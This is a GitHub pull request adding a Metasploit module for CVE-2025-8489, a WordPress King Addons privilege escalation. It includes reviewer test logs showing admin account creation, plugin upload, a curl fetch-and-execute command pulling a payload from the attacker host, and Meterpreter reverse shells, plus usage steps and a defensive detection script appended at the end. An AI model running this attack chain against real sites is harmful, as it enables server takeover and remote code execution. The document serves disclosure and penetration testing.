Add WordPress King Addons privilege escalation exploit (CVE-2025-8489) #20746
modules/exploits/multi/http/wp_king_addons_privilege_escalation.rb (review comments: outdated, resolved)
documentation/modules/exploit/multi/http/wp_king_addons_privilege_escalation.md (review comments: outdated, resolved)
…ege_escalation.md Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
…n.rb Co-authored-by: Phil Townes <phil_townes@rapid7.com>
…n.rb Co-authored-by: Phil Townes <phil_townes@rapid7.com>
…tom.ini from documentation
jheysel-r7
left a comment
Thanks for the great module and easy to follow setup instructions 🫡
Testing
PHP Target
msf exploit(multi/http/wp_king_addons_privilege_escalation) > options
Module options (exploit/multi/http/wp_king_addons_privilege_escalation):
Name Current Setting Required Description
---- --------------- -------- -----------
EMAIL attacker@example.com yes Email for the new user
NONCE_PAGE /register/ yes Path to page containing King Addons Login Register Form widget
PASSWORD Password123! yes Password for the new user
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sapni, socks4
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 5556 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME attacker yes Username to create
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 PHP In-Memory
View the full module info with the info, or info -d command.
msf exploit(multi/http/wp_king_addons_privilege_escalation) > set verbose true
verbose => true
msf exploit(multi/http/wp_king_addons_privilege_escalation) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking /wp-content/plugins/king-addons/readme.txt
[*] Found version 51.1.14 in the plugin
[*] Found nonce: ae1c9631e6
[+] The target appears to be vulnerable.
[*] Acquired a plugin upload nonce: b35bbe8ee8
[*] Uploaded plugin wp_sxzlg
[*] Sending stage (41224 bytes) to 172.16.199.1
[+] Deleted ajax_ny4ad.php
[+] Deleted wp_sxzlg.php
[+] Deleted ../wp_sxzlg
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:57681) at 2025-12-09 15:27:05 -0800
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : dfb3f25a6d96
OS : Linux dfb3f25a6d96 6.12.54-linuxkit #1 SMP PREEMPT_DYNAMIC Tue Nov 4 21:39:03 UTC 2025 x86_64
Architecture : x64
System Language : C
Meterpreter : php/linux
meterpreter > exit
Linux Target
msf exploit(multi/http/wp_king_addons_privilege_escalation) > set username userthree
username => userthree
msf exploit(multi/http/wp_king_addons_privilege_escalation) > set email userthree@example.com
email => userthree@example.com
msf exploit(multi/http/wp_king_addons_privilege_escalation) > run
[*] Command to run on remote host: curl -so ./XAkcelXpHriY http://172.16.199.1:8080/Hn-8qIL46e0vZdQpIHPToA;chmod +x ./XAkcelXpHriY;./XAkcelXpHriY&
[*] Fetch handler listening on 172.16.199.1:8080
[*] HTTP server started
[*] Adding resource /Hn-8qIL46e0vZdQpIHPToA
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking /wp-content/plugins/king-addons/readme.txt
[*] Found version 51.1.14 in the plugin
[*] Found nonce: ae1c9631e6
[+] The target appears to be vulnerable.
[*] Acquired a plugin upload nonce: d9a703d7bc
[*] Uploaded plugin wp_aao1q
[*] Client 172.16.199.1 requested /Hn-8qIL46e0vZdQpIHPToA
[*] Sending payload to 172.16.199.1 (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.16.199.1
[+] Deleted ajax_zp69g.php
[+] Deleted wp_aao1q.php
[+] Deleted ../wp_aao1q
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.1:62548) at 2025-12-09 15:52:30 -0800
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : 172.20.0.3
OS : Debian 11.8 (Linux 6.12.54-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
…n.rb Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
…n.rb Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Release Notes
This adds an exploit module for CVE-2025-8489, an unauthenticated privilege escalation vulnerability in the WordPress King Addons for Elementor plugin (versions 24.12.92 to 51.1.14). The vulnerability allows unauthenticated attackers to create administrator accounts by specifying the user_role parameter during registration, enabling remote code execution through plugin upload.
Hello Metasploit Team,
This PR adds an exploit module for CVE-2025-8489, an unauthenticated privilege escalation vulnerability in the WordPress King Addons for Elementor plugin (versions 24.12.92 to 51.1.14). The vulnerability allows unauthenticated attackers to create administrator accounts by specifying the user_role parameter during registration, enabling remote code execution through plugin upload. The plugin has over 10,000 active installations according to WordPress.org statistics.
Prerequisites:
- WordPress user registration enabled (users_can_register option)

Verification:
1. Start msfconsole
2. use exploit/multi/http/wp_king_addons_privilege_escalation
3. Set RHOSTS to target IP
4. Set NONCE_PAGE to the path of a page containing the King Addons Login Register Form widget (e.g., /register/)
5. Set USERNAME, PASSWORD, and EMAIL for the administrator account to create
6. Set PAYLOAD and LHOST/LPORT
7. run

References:
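Added example, not part of the PR or of the Metasploit module: a defender-side Python helper for the two facts the description gives. It reads the Stable tag from a plugin readme.txt and checks it against the affected range stated above (the module's own check also reads readme.txt, as the test output shows), and it inspects already-parsed registration POSTs for a client-supplied user_role field, which is the indicator the description names. The readme text, the request records and the assumption that the registration form posts back to the NONCE_PAGE path (/register/) are constructed for this example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Affected version range as stated in the PR description (inclusive bounds).
VULN_MIN: Tuple[int, ...] = (24, 12, 92)
VULN_MAX: Tuple[int, ...] = (51, 1, 14)


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn a dotted version string such as '51.1.14' into a comparable int tuple."""
    return tuple(int(part) for part in version.strip().split("."))


def readme_stable_tag(readme_text: str) -> Optional[str]:
    """Pull the 'Stable tag' version out of a WordPress plugin readme.txt.

    The Stable tag line is where a WordPress.org readme records the released
    version, so it is what an inventory script can compare against.
    """
    match = re.search(r"^Stable tag:\s*([0-9][0-9.]*)", readme_text,
                      re.MULTILINE | re.IGNORECASE)
    return match.group(1) if match else None


def is_vulnerable_version(version: str) -> bool:
    """True when the version falls inside the range the PR lists as affected."""
    try:
        parsed = parse_version(version)
    except ValueError:
        return False  # malformed or non-numeric tag (e.g. 'trunk'): do not guess
    return VULN_MIN <= parsed <= VULN_MAX


def flag_role_escalation(requests: List[Dict]) -> List[Dict]:
    """Flag unauthenticated POST bodies that try to choose their own role.

    A self-registration form has no legitimate reason to let the client pick
    a role, so a user_role field in an unauthenticated POST is the indicator
    the PR describes. Authenticated requests (an admin creating a user in
    wp-admin) are skipped; the request records here are constructed.
    """
    findings = []
    for req in requests:
        if req["method"] != "POST" or req.get("authenticated", False):
            continue
        role = req["params"].get("user_role")
        if role is None:
            continue
        findings.append({
            "client": req["client"],
            "path": req["path"],
            "role": role,
            "severity": "high" if role.lower() == "administrator" else "medium",
        })
    return findings


# Constructed sample readme.txt (not the real plugin's file); the version
# matches the one the reviewer's test target reported.
SAMPLE_README = """=== Example Plugin ===
Contributors: example
Requires at least: 6.0
Stable tag: 51.1.14
License: GPLv2 or later
"""

# Constructed, already-parsed request records: a normal registration, a
# registration that smuggles user_role, and an authenticated admin action.
SAMPLE_REQUESTS = [
    {"client": "198.51.100.7", "method": "POST", "path": "/register/",
     "authenticated": False,
     "params": {"username": "alice", "email": "alice@example.com", "password": "..."}},
    {"client": "203.0.113.9", "method": "POST", "path": "/register/",
     "authenticated": False,
     "params": {"username": "attacker", "email": "attacker@example.com",
                "password": "...", "user_role": "administrator"}},
    {"client": "192.0.2.5", "method": "POST", "path": "/wp-admin/user-new.php",
     "authenticated": True,
     "params": {"user_login": "bob", "role": "editor"}},
]


if __name__ == "__main__":
    tag = readme_stable_tag(SAMPLE_README)
    print(f"readme Stable tag: {tag}, in affected range: {is_vulnerable_version(tag or '')}")
    for finding in flag_role_escalation(SAMPLE_REQUESTS):
        print(f"[{finding['severity']}] {finding['client']} POST {finding['path']} "
              f"user_role={finding['role']}")
```

The version check is only a prioritisation aid; the request inspection is the part that catches the behaviour on a live site, and it needs request bodies (a WAF, reverse proxy or PHP-side hook), since ordinary access logs do not record POST fields.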